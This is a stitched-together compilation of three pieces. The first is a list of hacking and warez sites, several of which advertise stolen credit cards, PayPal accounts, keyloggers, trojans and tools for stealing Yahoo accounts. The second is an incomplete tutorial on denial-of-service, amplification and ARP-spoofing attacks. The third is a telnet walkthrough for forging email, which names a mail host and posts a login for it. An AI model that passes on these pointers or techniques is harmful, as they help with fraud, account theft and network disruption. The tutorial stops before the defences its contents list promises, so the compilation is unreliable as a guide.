G0t-Root.Net
G0t-Root.net Best for undetectable toolz, CC's, Paypals, Exploits, All is very welcome, Learn to hack, code, use exploits and much more join now and share your hacking knowledge, Services: G0t-Root Forum, G0t-Filez Upload Filez, G0t-Crack Crack your hashes, G0t-Paste Paste Code
---------------------------------

suck-o.com
Hacking/Coding/Web Development - Friendly forums and a huge high quality download section with no dead links. If you are annoyed by crappy sites plastered with ads and no useful content then join our knowledge-pool...we're independent and non-commercial. Receive help on the boards and have fun with our wargames. -new server based wargames are about to come up-
------------------------------------

Hackers Center - All the tools you need
The best resource for hackers and crackers: tons of tools, tutorials, free books, papers, exploits and now HSC ethical hacker course, hacking videos. Updated twice a day
--------------------------------------



Downloads - Plundered
Hi-speed collection of mp3s, software etc, come have a browse.
-----------------------------

Code:Pirates Forum
MULTI forum for all you If you're lonely PIRATES ON NET, and looking FOR FREE SEX Members Area by hacking password and usser.super movies and special rape movies by the hacking rape sites also..BY hacking cracking tools Free programs you've found the right place:Passwords are being checked in realtime No dead passwords-Learn to Crack and BE a Power Pirate Hacker/Cracker Area Hackers Crackers AREA Hacking/Cracking Security General Tools by BIG-SELDOM-COLLECTION ARE IN THIS AREACracking Full Tools,Exploits. Hacks,Cheats,Keyloggers y Sniffers, Mail-Bombers,Nukers,Scanners,Security Holes,Word Lists,Warez,Virusses,Trojan.Webkiller 3.4.5,and FireWebkiller by Russia .. etc If you want to join our site you must give a valid reason,no blank applicants will be accepted.All blank applicants will be deleted.No exceptionAND If the majority thinks you're being a pain in the neck Then the majority rules.If you ignore the rules, you will be CANCELED..Be cool, y'all Follow....We accept only TRUSTED MEMBERSDont be late...Enjoy our Forum Pirates
-------------------------

Anpcorps l The Next generation
The best hacking experience all in one site with tons of downloads.Anpcorps is the place to be looking for hacking tools.
--------------------------

Welcome to the Final4Ever Forums , computer, security, network, hack, crack, free, software, warez, serial, program, download, mp3 etc. to the world of wireless. While this technology is constantly growing, replacing the traditional wired world that we live. --------------------------------------

--- CRACKSKEYGENSSERIALS ---
Free FULL Downloads Cracks, Keygens, Serials, Appz, Gamez, Moviez, Music Popup Advert-Free
-------------------------------

X-ACCESS
Best Passes, Spoofs, BackD00rs, Passfil3s, Warez, Mp3, Movies, Pictures, Art, etc. For those who like to share and like to have feedback for their work. Pass WeAreBack
--------------------------------

I-Hacked.com Taking Advantage of Technology
Electronics are everywhere, and technology drives pretty much everything we do in today's world. We show you how to take advantage of these electronics to make them faster, give them added features, or to do things they were never intended to do. We are not a cracking site, we are hackers. Our inquisitive nature leads us to find ways of making technology work for us. We do not support unauthorized access into systems, breaking into email systems, or anything of that nature. Please do not email me asking me how to do this type of stuff.
--------------------------------------

Hackers..Realm..
Hackersrealm portal and community for hackers tools, Booters, yahoo tools, virus's, tutorials, rootkits, binders, brute forcers, crackers, mail bombers, keyloggers, scanners, dos and ddos tools, trojans, passlists, exploits,
-------------------------

TiTHacK TiTSecurity Microsoft HacKers.
Microsoft fransa hacker. Web hack Web Security. Mail hack And Web server security. Son xssler. Web Hack and Web hack security. New Xss New Bug Deface. DotNetNuKe NEW Bug First in here DotNetNuke HacKer DotNetNuke all exploits in here
--------------------------------------

..-www.Yahoo Boots .com-..YTunnel_BOOTS
It's what the site name is. We have the largest archive of boots and yahoo related progies.
----------------------------------

DDL Full WAREZ Rapid Forums
DDL, Warez, Apps, Games, TV, Movies, HD, Ebooks, Roms/Emulators and more.
------------------------------

MegaSecurity
Latest Security News, Trojan alerts, Vulnerabilities, Exploits, DDOS, Firewalls and much more
-------------------------------

Security Shell
Security Information,Security News,Security and Hack Tools,Tutorials,Video And Much More
--------------------------

Elitec0ders.Net -Keyloggers-Bakdoors- IE-Exploiter
Firewall bypassing keyloggers,backdoors,webdownloaders,IE Exploit creator and more tools ..
------------------------------

How2Hack Security Group
Here you will find tons of tutorials, downloads, challenges, and places to try your hacking skills. This is a huge portal for people to learn how to hack passwords, web sites, etc.
-------------------------------------

Really Fresh Proxylists - updated nonstop
Site offers free access to the minutely updated database of HTTP/HTTPS proxies via flexible user interface allowing selection of proxy properties like its type, connection latency, etc. Check your Proxies with our fast Proxychecker. Free online Proxy.
-------------------------------

-
1 Rated Anonymous Proxy. Browse the web completely anonymously, access restricted sites from work or school. Hosted on a Fast OC-3 USA server.
-----------------------------

BOOKWAREZ HOME
EbookZ,ComponentZ,CertificateZ,CodeZ
----------------------------------

hackr.org - Learn To Hack
Hacking challenges, discussions, and much more. If you want to learn more about hacking, this is the place to be.
-------------------------------------

GSO The Largest Hacking Exploit Security Forum
Enjoy forum discussions on the latest exploits and security topics, with downloads. An extremely active board with an active IRC channel for chat. Join the hundreds who are actively participating right now.
-------------------------------

- v60-hackers -
v60-hackers is a forum if you wont to shear knowlge .. code .. and ideas we do not wont spaming , flameing or any other type of half brain ideas hear we wont to help you lern or you help us we dont cear aslong as this community can help we have d0wnl0ads , ebooks , tuts , forum , we dont realy mind about vip just show us you are not a script kiddy and help us to fill the vip sections so if your still reading this please join us we dont bite we all so have a small but growing usesfull downloads included wherz and seral codes
------------------------------------------------

BT Downloads
Need a download We got them here. Get movies, music, programs, games, cracks, keygens, and much more Got a computer problem Maybe we can help with our BTDownloads help team.
-------------------------------------------------

Old Skool Crew
We have hacking tools, tutorials, video tutorials, brute forcers, generators, worms, viruses, come visit us
-------------------------------
KnbykL They 1 Legend
Professional security page
-------------------------------
Public Web Proxies
Public Web Proxies provides you with a wide range of information about proxy servers, CGI proxy and anonymous surfing
---------------------------------------------------

Hackers Home Page
Comprehensive on-line catalog designed for the serious hacker, phreaker, cracker, casino cheater, dss and cable tv user, spy, financial hacker, and electronics enthusiast.
--------------------------------------------------------------

uNkn0wn.eu - Security board.
uNkn0wn.eu - Security board since 2006 - get help about everything you need - daily updated with best rises from brains of our members - fresh Packers - Crypters - Protectors -over 100- - Related sources - RATs - BOTs - Proxys, socks - etc.. - enjoy getting now what you always dreamed to get - feel free to checkout our board and register - we're sure you wont repent it.
--------------------------------------------------

k0h.org
in this forum, you can find a lot of information about hacking, programming, operating systems, , gaming, and a lot more ...
-----------------------------------------------------------

Security/Hacking/Coding/Web Development - Friendly forums and a huge high quality download section, no dead links. If you are annoyed by crappy sites plastered with ads and no useful content then join our knowledge-pool...we're independent and non-commercial. Receive help on our boards and have fun with our upcoming wargames.
---------------------------------------------------------------------

Paltalk Cracks Hacks Tweaks
Paltalk Cracks hacks Programs, Tweaks, Exploits, Internet security, VB Codes
------------------------------------------------

DarkYahoo Welcome to YAHELL
The best booters, antis and YTools on the planet
-----------------------------------------
Sacred-Hacks
hacking tutorials, security, trojans, viruses, help, and more. All is Popup free for life.
--------------------------------------------------

Proxy List Net
Free proxy lists and an automated proxy checker.
--------------------------------------------------

Fresh Proxy Lists - Update Evry Day
You can find free proxy lists , anonymous and Elite.Socks proxy too.Can choice from forum and fast speed
-----------------------------------------------


---------------------------------

No.1 site on for your cracker, booter and lots of crack tools. Don't u want to hack a Yahoo ID, I know u want to, so don't waste time, come and download all the programs which are needed to steal a Yahoo account. No annoying registration needed and site update everyday with new downloads. With 24/7 Forum support. I can guarantee you will never leave this site. If you don't visit this site and don't read our documents, then u are missing the most important part of hacking as this is the only site that have all the details on how to hack a Yahoo ID and that really works.
-----------------------------------------------

_-_-_www.ChatBoots.com_-_-_
Chat Boots .com AIM Yahoo MSN ICQ more - Downloads Programs for all the messengers - Tools Help Tweaks Crackers Blockers - and more -100 FREE
----------------------------------------------

-----------------------------------------

Ethical Hacker Network
This free online magazine for the professional pen tester is the home of the Skillz Hack1ng Challenge hosted by Ed Skoudis and Free Monthly Giveaways where 1000s of dollars in prizes have been awarded to top contributors. Calendar of hacker and security cons, forums, tutorials, how-tos, tools, certs, regular columnsists and more.
-------------------------------------------------------

Hacking DataBase
So...you want to be a hacker, huh This is a state of mind

------------------------------------------------

Hackers Portal
All links to hackers utilities on the web, including phreaking, hacking security, filez, progs, warez etc.
----------------------------------------------

The Darkcode of Python
/// FORUM NEW Help Us Grow /// databases,, scanners, encryption, irc-bots, google dorks, miscellaneous, others, etc. Where the python bytes back
--------------------------------------------------

Proxz.com - free proxy servers
Free proxy servers here. Large forum community with daily updated proxies.
----------------------------------------

Xroxy Proxies
More than just proxy. Proxy lists of different kinds. Xorum proxy message board. CGI web proxy service with SSL support.
---------------------------------------

HaX
HaX the next generation of security has arrived and lives here. Join the ever growing community.
------------------------------------------

.-.-Hackers-Black-Book-.-.__Learn2Hack
Just another hacking site with tutorials.. We also have a feature on The Mentor. And one of his original untouched tutorial from back in the days.
------------------------------------

EliteHackers.Info
Hacking Related Information
----------------------------------------

Flyninja.net - Underground Search
Flyninja.net - Find what your looking for using our Underground Search Hacking, cracking, phreaking, anarchy and tools search engine. Also categorized directories to help you with your searching - HUGE FILE LIST GET JITKO
----------------------------------------

Yahoo-Owned
Yahoo Booters, Crackers, Tools. and great VIP area with more porn and software than you could ever stuff into that hard drive
------------------------------------------

USB Hacks
Dedicated to endpoint insecurity
------------------------------

Romanian Hackers Zone
RST Romanian Security Team Ethical Hacking - Site dedicat securitatii aplicatiilor web unde se pot gasi articole, tutoriale text si video, bug reports raportari site-uri vulnerabile, cookie logger sistem de logare a cookieurilor, un forum de discutii si mai multe altele
--------------------------------

-.-.- -.-.-
...Now V3.0 released with more than 17000 Members At the moment you have 5 levelbased Challenges with up to 10 Level each. Scores, Ranks, Statistics, Forum and Chat. Tutorials in German and English. Also over 150 nonlevelbased Challenges which will be weekly more. Our Forum is well moderated and in our Chat you will also find a Helpbot for the Challenges or just talk to others. ...
--------------------------------------

The Elite Hackers Site
This is the ultimate resource for all of your hacking needs. This is the only site on the web that will invite newbies in, and not let them leave, not until they're elite, anyway.From basic tutorials and setups, to remote protocols, strategies, viruses, and much more, we have everything you need to become one of the elite. All you need is to be 15 and have an open mind.
---------------------------------------

FoxyProxy
Visit filtered/blocked/disallowed sites, all from the safety of your browser.
--------------------------------------

Crack Overzichten
Lots of links to hacking, cracking and security site.
----------------------------------------

..T3RR0R-Inc..
t3rr0r-inc.com features an elite downloads database packed with various resources including : hacking utilities, computer warez and security, media, graphics, webdesign, programming and resource, yahoo related warez and many other misc. utilities.
----------------------------------------

HackerCity.Us - Yaayan Efsane Turkish Hackers
HackerCity.Us - World Hacker Center - Security and hacking Portal
----------------------------------------

UnlimitedWarez
Warez and cracks forum
----------------------------------------------

Elite Force Scripts
For All Your Digi Chat Exploiting Needs.
-----------------------------------------

EnigmaGroup
We are a non profit Hacking Organization here to provide you a safe and legal place to hack and learn some basics in hacking. We have many different challenges for you to test your aquired skills, or learn new ones along the way. Don't forget to visit the forums, and read all the articles you can, and feel free to post a few articles yourself. New ideas are submitted and reviewed on a daily basis, so suggest all you want too. Register, and join the group today
--------------------------------------

3rr0r
3rr0rs security siteexploits, tutorials, programmingalso have the domain: 1337357.org
-------------------------------------------

SzeneLinks
Der Name ist Program
-----------------------------

leetupload.com
A Hacker's Database that consists of 'hacking' files, security papers, tutorials, videos, and anything else security or penetration related. The main point of this site is to create one central site that has files that are either no longer being hosted anywhere else, or are difficult to find. To help keep the database up to date, anyone can upload security related files, and once reviewed, they will be added to the database. Now with n00b friendly forums too
----------------------------------

Zero Identity
Zero Identity is a web security training website, a community for hackers and more. We have video tutorials, articles, forums, user blogs, challenges, web tools and more Come give us a visit and learn to secure yourself today.
-----------------------------------------------

gohack
GoHack.org is a fresh website for you new and experinced hackers looking for a community to share and test you knowledge on a wide range of challanges.
-------------------------------------------

Proxy1080
Proxy1080 is a free web proxy service that allows web surfing unblocked from many restrictive firewalls.
---------------------------------------

UplinkLounge Feed your inner hacker
UplinkLounge is haven for free thinkers artists, hackers, and free spirits. We hope to provide a strong community for sharing information and ideas amongst like minds.
---------------------------------------------------

Wethepeople
German Link Site
------------------------------------

Secure Death d0t com
If you didnt hack your system, who will do it Security is our right. Hacking is our left.


some are nice sites while some r useless

Bruteforcing Programs

Wordlist Tools





Proxy Tools




Decrypting Tools


Log Tools



Spoofers

PACKET ATTACKS - VERSION 1.1


Let me start by saying the internet is full of wonderful tools and papers like this one. Alot of these things can help you
increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them to
much and decide to harm other peoples work for no apparent reason. Let it be known that is in no way the purpose of this
paper. A true hacker is one who strives to attain the answers for themselves through curiosity. Its the path we take to
those answers that makes us hackers, not destruction of other peoples work. So with that said, please enjoy my work, as I
have enjoyed writing it.

The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage.
Well I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run on s
entences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the
specifications of a protocol by reading its 30 page RFC document. But that is the protocol according to design, in the wild
its a different story all together. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP hijacking. Hence the
name "Packet Attacks". This paper also focuses not just on attacks but practical ways to prevent such attacks and ideas on
new methods to help us stop them and secure our networks.


Introduction:
TCP/IP Packet Switching Networks
OSI MODEL


---Chapter 1.---
Section a.
Introduction to DDOS/DOS & Packet Attacks
Section b.
How attacks are crafted

---Chapter 2.---
Section a. (attacks)
ICMP
Smurf
SYN/ACK
UDP
DNS
ARP
DrDOS
Special Bot / Trojans
Worm DOS
Unicode ping flood (new!)
Section b.
Phasing
Section c. (hacks)
TCP hijacking
Sniffing
Scans
Information gathering / Footprinting
Section d.
Defense against these attacks
Attack Detection
Intrusion Detection
Section e.
IPSEC
NAT as a means of security

---Chapter 3.---
Section a.
The future of TCP/IP as a means of using IPv6

---Chapter 4. ---
Section a.
New security application / protocol

-----
Introduction.

Well I assume most of you reading this paper already have a good understanding of TCP/IP and how it works so I wont get to
much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of
machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and
lots more. All of these devices (although some are smarter then others) push along packets. Our operating systems and
applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size,
carries a small bit of data to and from one host to another. Each packet must also carry its own personal information such
as where it came from and where its headed. Of course there is a lot more to a packet then just this information. But as far
as attacks go this is the crucial information we need to look at. Now there are many many different types of protocols that
craft many different types of packets. And they are all read differently when they are received at the other end. Where as
an ARP packet may tell a host who has this MAC address on this subnet, a TCP packet might transfer the last few bits in that
MP3 your downloading. Regardless the data, all of these packets use the same wire to move to and from locations. I couldn't
possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all of this
running in the background while they surf the net. Most people dont understand the complexity of this internet we are all so
familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that. Reverse
engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP is so
embedded in our infrastructure we must adapt and learn to defend each new attack.

OSI MODEL

Open Systems Interconnection model, is a seven layered networking design. Its an industry standard that defines exactly how
data is transffered between protocol to protocol. Not every protocol follows the OSI model exactly and some do. TCP the
internets main mode of data transport does not follow it exactly. Let me take you through a brief over view of the OSI model.

Layer Seven : Application Layer
This layer is obviously application specific, it provides everything from authentication to email to ftp and telnet, the
list goes on. Its specifically for end user processes, what we input into our applications we can see on our screens.

Layer Six : Presentation Layer
This layer changes and possibly encrypts the data so that the application layer can understand it. (you will understand what
this means in a few minutes)

Layer Five : Session Layer
Think of this layer as Establishment, Control and Termination of the sessions formed by the
application(client) to a remote host(server).

Layer Four : Transport Layer
This layer is responsible for the invisible transfer of data between host to host. It is there to ensure all data transfer
goes accordingly. The protocols used are, UDP and TCP.

Layer Three : Network Layer
This layer is for error correction, packet sequencing, and for transmitting data from node to node. Addressing is also
another function of this layer in inter-networking.

Layer Two : Data Link Layer
This layer decodes and encodes packets into bits so they are ready for the physical layer. It also handles error correction
in the physical layer. This layer is also divided into two different sub-layers. The LLC (logical link control) and MAC
(media access control) sub layers. The LLC sub layer provides control for frame synchronization and error checking. The MAC
sub layer controls how a computer on your network has access to data.

Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulse or some other form of data movement is pushes the
bit stream towards the other host. This layer is the hardware level, the ethernet card, the wire etc. There are many
protocols within this layer.

You may ask yourself why I listed these from 7 to 1. Well I did to show you how the OSI model really works. Layer Seven
really comes first, the end user types something into his instant messenger (for example) and the data flows down through
the OSI model being encapsulated and changed at every level it has to be changed or corrected at. The data travels the wire
and at the other end it moves back up the OSI model all the way back up to layer seven where the other host can read it in
the original form it was sent. So theres a VERY basic understanding of the OSI model and how it works to transmit data from
host to host. There is alot more protocols and parts to the OSI model but this basic representation should provide a firm
understanding.

To understand all of this more in depth please get your hands on a few RFC (request for comment) documents and start reading.
Because it will take you a very long time to understand exactly how TCP/IP works. If your very knowledgeable in the way
TCP/IP works then this paper should make alot of sense to you, perhaps even bore you! :( On the other hand if you dont
understand TCP/IP as well as you would like to, you still might get something out of this. I try and explain all of the
technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks :)
Data_Clast

---------------------------------------------------------------------------------------
Chapter 1.

Section a.

The most common attack on the internet today is a denial of service attack. There are many programs on the internet today
that will assist anyone in crafting one of these attacks. The sad part is for as easy as they are to make their power can be
destructive when used properly. No matter what kind of packet attack it may be most are based on the same principal, volume.
Thousand and thousands of spoofed packets will eat up network resources within minutes, choking and essentially 'killing'
any network. There are many types of packet attacks. Some are more sophisticated then others. I will also talk about TCP/IP
hijacking and your typical port and vulnerability scans among other things.

Why do people launch these attacks? How are they launched? How do they exactly (technically speaking) 'choke a network'?!
Hold tight im getting to that. The lower end of these attacks are usually launched by what the hacker community calls a
script kiddie. You see a hacker isnt a mindless web defacing juvenile (please see the mentors manifesto). A hacker is a
person of true intellect and would never craft such an attack for no reason. But these lower end attacks are usually
launched at peoples individual machines. Their IP address's may come from an IRC chat room, yahoo messenger, AOL, ICQ, or
whatever other messenger you might use. Although not as sophisticated, these 'lower end' attacks can still knock an
individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to
slow their sales or disrupt their outgoing internet connection. Whatever the reason may be they are usually launched for a
reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.

The more sophisticated attacks are aimed at government and root points of the internet. Such as the attacks on the root DNS
servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an
hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes who knows the damage
it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to
none because they are created and launched by skilled malicious individuals. They were also distributed denial of service
attacks. Which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more
on that later though.

Section b.

You will learn more about how these individual attacks are crafted and how they work later in this paper but this is
small introduction so you can get a vague idea. Creating spoofed packets requires an open socket. This socket binds to an
IP and a port and allows you to inject a packet onto the wire or accept any incoming packets to that IP and port. *NIX
openly supports open socket programming (many tutorials on this type of programming). Which means you can code programs that
create packets and then inject them into the network with ease. An example of this would be a program called "SENDIP" which
allows you to create custom packets, and it supports many protocols (another good program is nemesis). I have written a few
tutorials using SENDIP, I think its a great program for both advanced and new network engineers to use. It will help you
learn about packet structure and the different protocols it supports. Microsoft is not an open source company, which pretty
much makes it even harder to find help in creating these sorts of programs for Windows. But it is possible to craft these
attacks from within a Windows environment. Its referred to 'Winsock' programming. Infact most of these DDOS attacks are
because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and other programs that craft
these attacks on servers when commanded from a client program to do so. Most end users do not understand security and how
easy it is to break into someones home computer, so they lack firewalls and virus scanners. This leads to many zombie
machines available to hackers disposal on the net. All one has to do is scan a class C subnet for open trojan ports and
hack their way into those trojans and use them as a backdoor, another zombie is created for attacking remote targets. Almost
every program that interacts with TCP/IP generates packets to and from places, this is valid traffic. As you read you will
distinguish the difference between valid and non valid, as it easy pretty easy to understand what I am explaining when I say
"attack". When creating an open socket and crafting spoofed packets these programs tell the kernel they are going to
construct their own IP headers. Usually this information is put on by the kernel before exiting the machine. But in this
instance we are telling the kernel we want to specify our own information. Not all operating systems will allow this. And
no I dont have a detailed list of which do and which dont. Most of the experiments I have conducted on my network used
different versions of RedHat Linux, Mandrake Linux, and Windows XP.


Chapter 2.

Section a.

There are several different types of packet attacks. Theres the simple brute flood of ICMP packets which floods a network
and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack.
All of these attacks target different things. While the SMURF attack may target the general network its attacking, the
SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration when a target is
attacked it may not be the only machine affected. There are many routers and other boxes transfering the data between point
A and point B. Other peoples legitimate data is flowing between them, and may be disrupted by the packet flood. Even a top
of the line router can only handle so much data. And unfortunately it is very easy to attain soure code for these attacks
all over the web. Lets take a more detailed look at each attack.


ICMP brute flood attack.

ICMP works on top of TCP. The ICMP protocol is simple yet very effective. Its used for error correcting and testing network
connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of
arbitrary data in an ECHO_REQUEST packet it waits for a reply from the target host, simple right? A typical ICMP packet is
called an ECHO_REQUEST. You send 4 or 5 of these at a target machine and when it arrives there it requests an ECHO_REPLY.
Thats when everything is done according to design. If you want more info on an ICMP packet and how it works then read my
tutorial on that!
http://www.theory-x.org/dataclast/_content/MPS.txt

In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their
destination. They reach point B, request an ECHO_REPLY for every ECHO_REQUEST sent. Point B says OK, reads the source IP.
The source IP ends up being unreachable. But point B is waiting a small amount of time (milliseconds) to determine that for
every packet thats hitting it. It will be a few more moments before the process relinquishes this small bit of memory back
to the system. This adds up to a great deal of packets and memory allocation building up. Now if these packets are coming
from multiple source zombies (DDOS) then this means there each coming from different routes. So even if one ISP stops one
attack, there are still many more zombie machines attacking the victim. All of this is eating up time and bandwidth, because
with every millisecond that passes more and more bandwidth is being taken up. Eventually point B can no longer keep up with
the ECHO_REQUESTS and his connection is completely flooded and of no use. On an unprotected system or router this attack
can be very consuming. This attack is also sometimes referred to a bandwidth attack. Even if the target is running an
advanced firewall it cannot protect the wire it connected to from being flooded with packets. There have been changes in
this attack as well. On the net there are what we call amplifiers. On every network there are the network and subnet
addresses. In many default configurations when you ping either one of these addresses they multiply the echo requests by 4
or more. So a zombie would attack a vulnerable network (.0) or subnet address (.255) with a spoofed source IP, being the
victims real IP. So even tho the traffic becomes valid as far as IP addresses go. The victim gets bombarded with massive
ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of those to.

[zombie machine] -->ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[??????????????] ICMP ECHO_REPLY (destination 1.1.1.1 ?)<-- [target]

Hopefully that simple drawing shows you exactly how this attack works. Its very very simple, massive ICMP packets with
spoofed address's taking up network resources. The simplest of attacks.


Smurf attack.

(first part is repeat from ICMP attack) There have been changes in the ICMP attack. On the net there are what we call
amplifiers. On every network there are the network and subnet addresses. In many default configurations when you ping either
one of these addresses they multiply the echo requests by 4 or more. So a zombie would attack a vulnerable network (.0) or
subnet address (.255) with a spoofed source IP, being the victims real IP. So even tho the traffic becomes valid as far as
IP addresses go. The victim gets bombarded with massive ECHO_REPLY packets. You will see more of this description in other
attacks, as it works for those to.

You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine,
any machine and ping your broadcast address. Mine is 192.168.0.255 Immediately you see each machine receiving a broadcast
packet. Now imagine its several hundred and each one has a spoofed source IP address. Its a brute ICMP attack on a massive
scale, this possibilities to this attack are endless. You could easily implement this attack in anyway you chose. You could
spoof the victims real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though its valid
traffic, its 4x or more times the normal load of valid traffic. This consumes the connection and valid traffic cant pass,
or passes so slowly it makes no difference to the end user.

[zombie machine] --> ICMP ECHO_REQUEST source ip = 10.2.2.2 --> to: broadcast router 4.1.0.255 (router multiplies the
ECHO_REPLY packets by 4x! --> --> --> --> [victim 10.2.2.2]


SYN/ACK attack.

The SYN/ACK attack is a very powerful attack. SYN/ACK packets are also used in TCP hijacking, and the TCP/IP three way
handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection vs
connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make
a connection on a certain specified port, and then send data. When the target machine read the SYN packet it replies to
the original host with a SYN packet of his own and an ACK (acknowledgement) packet with sequence and ack numbers. These SEQ
and ACK numbers are used to synchronize the data transfer, incase one or two packets gets lost or slowed down along its
route, it can be assembled again in the correct order. The orignal machine replies again with another SYN ACK packet
combination acknowledging the sequencing numbers and then it starts to send data. When it creates this connection a tiny
piece of memory is allocated to hold the connection while the packets are in route. Now a SYN/ACK attack would consist of
spoofing the source IP address on the original SYN packet. The target receives the request for a connection, reads the
spoofed source IP and tries to send its own SYN and ACK packet to a destination that does not exist. Most operating systems
will continue to send SYN/ACK packets if they dont receive a reply as a method of error correction and guaranteed data
delivery. Just like in the ICMP attack the machine has to wait a few milliseconds before abandoning all hope of reaching
the machine. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target.
This attack is very powerful and can disable a service running on the target machine in a matter of minutes. Not to mention
all the available bandwidth is eaten with thousands and thousands of spoofed packets. So there is the SYN/ACK attack in a
brief description.

[zombie machine] --> SYN packet (source IP 1.1.1.1, port = 23 telnet) (seq = 100) --> [target]
[??????????????] <-- SYN/ACK packets sent (seq = 300) (ack = 101) <-- [target]

As you can see from the simple drawing above the target machine has no idea who is sending the SYN packets and the telnet
server he is running on port 23 would most likely crash. At best the telnet daemon would not allow any other legitimate
traffic through, as it could not gather enough resources (memory, bandwidth) to make the connection due to all the spoofed
packets.

Another use of this attack is to disconnect a user from their current TCP session. By spoofing SYN/ACK packets to a server
a client is currently using. An attacker would place a "FIN" flag in the packets, this tells the server the client is done
sending data. Client uses his connection and attacker walks away undetected, because it only took one packet to accomplish
this.


UDP attack

UDP is a protocol that is used to transfer data. Short for USER DATAGRAM PROTOCOL. UDP offers very little error correction
and is used as an alternative means for data transfer. It doesn't require the 3 way handshake such as the SYN/ACK method,
so its initial attack may not take down a remote daemon as quickly. UDP is generally used to broadcast messages over a
network. A UDP attack would consist of spoofing the source IP addresses and specifying a port number like in the SYN attack
above. UDP packets are generally large because they are usually used on closed 100mb subnets (LANS). So an attack would set
flags in the packets and fragment them (break them up and flag where in the packet they broke, so they can be reassembled
on the receiving end). For example in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on
port 500. All an attacker had to do was connect to port 500 on a random machine with that port open. Start sending massive
UDP packets (above 500 bytes) to that service and the CPU usage would hit 99% and the machine would lock up. The typical
ports that accept UDP packets are 7, 13, 19 and 37 on a Windows box.

DNS attack

The DNS attack is a special one. Not as easily crafted as the others, there arent that many tools readily available to the
average script kiddie to construct such an attack. The DNS protocol is used for name resolution, 216.239.35.100 = google.com,
simple as that? Well not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to
create, but a DNS response is much bigger. So this is how a DNS attack would look like.

10.10.10.10 = victims IP

[dns query packet (who is google.com)] --> source IP is 10.10.10.10 --> [dns server]
[dns server] --> --> --> [dns response] [dns response] [dns response] --> [victim]

As you can see the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit'
there is a massive flood of them because the DNS server that is sending them is a very good machine on a very good
connection. The end user, most likely a home pc, gets flooded with these huge DNS response packets it never asked for.

ARP attack

The arp attack is a special one, it can be used to 'hijack' a tcp connection currently in session or it can be used to
sniff the legitimate traffic on a wire other then your own. Which is a very dangerous thing in the information world we
live in today. There are a few methods of this attack. Lets say person1, attacker, and server are all on the same subnet.
Person1 and server currently have an FTP session open. Attacker sends both server and person1 an ARP packet containing an
invalid MAC address. Now both of their arp tables are messed up for atleast 30 seconds. Server and person1 cant find that
invalid MAC address so they send their data to the IP its associated with, the attacker. So in this case the attacker has a
sniffer setup and hes collecting a ton of data. Now the attacker (an advanced one at that) can issue commands as person1 to
the server. This attack takes timing and skill to pull off on the internet, but on a LAN its very easy. It only allows for
maybe 30 or so seconds of sniffing, until their arp table is constructed properly again.

DRDOS attack

A DRDOS attack uses a little of other attacks to inflict damage. This attack spoofs the source IP address of SYN packets
to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is
some ftp, webserver, telnet.. ANY service that will reply with an ACK packet, anywhere on the internet. Could be angelfires
free ftp servers, could be your neighbors web server running off his 233mhz compaq with IIS 4.0. It doesn't matter! The SYN
packets are sent to that services IP address and they of course reply with a steady stream of SYN/ACK packets to the victim.
Most likely directed towards an open port on the victims machine, crashing that service and the system. These attacks are
near impossible to track down. This attack is quite possibly the strongest DOS attack in my opinion. For every SYN packet
you send the middle man, it sends out up to 4 SYN/ACK combinations to the victim. And each time the victim doesn't respond
the middle man sends even more (error correction). This allows the attacker to contruct a massive attack from just one
machine with a broadband connection. There are more dangers to this attack as well, there are hundreds of thousands of FTP,
webservers and many more services running on the net today that will deflect these SYN/ACK packets at the victim. So in
theory this attack could use any number of 'middle man' servers to bombard your network with packets.

How to Forge Email with Windows XP Telnet

Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my
techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using
telnet. Start with the command:

C:\>telnet techbroker.com 25
Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com
Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:
data
354 Start main input; end with .

Newbie note: just means hit return. In case you can't see that little period between the s, what you do to end composing your email is to hit enter, type a period, then hit enter again.

Anyhow, try typing:

This is a test.
.
250 Requested mail action okay, completed
quit
221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the
message we just composed looks like:

Status: R
X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date.
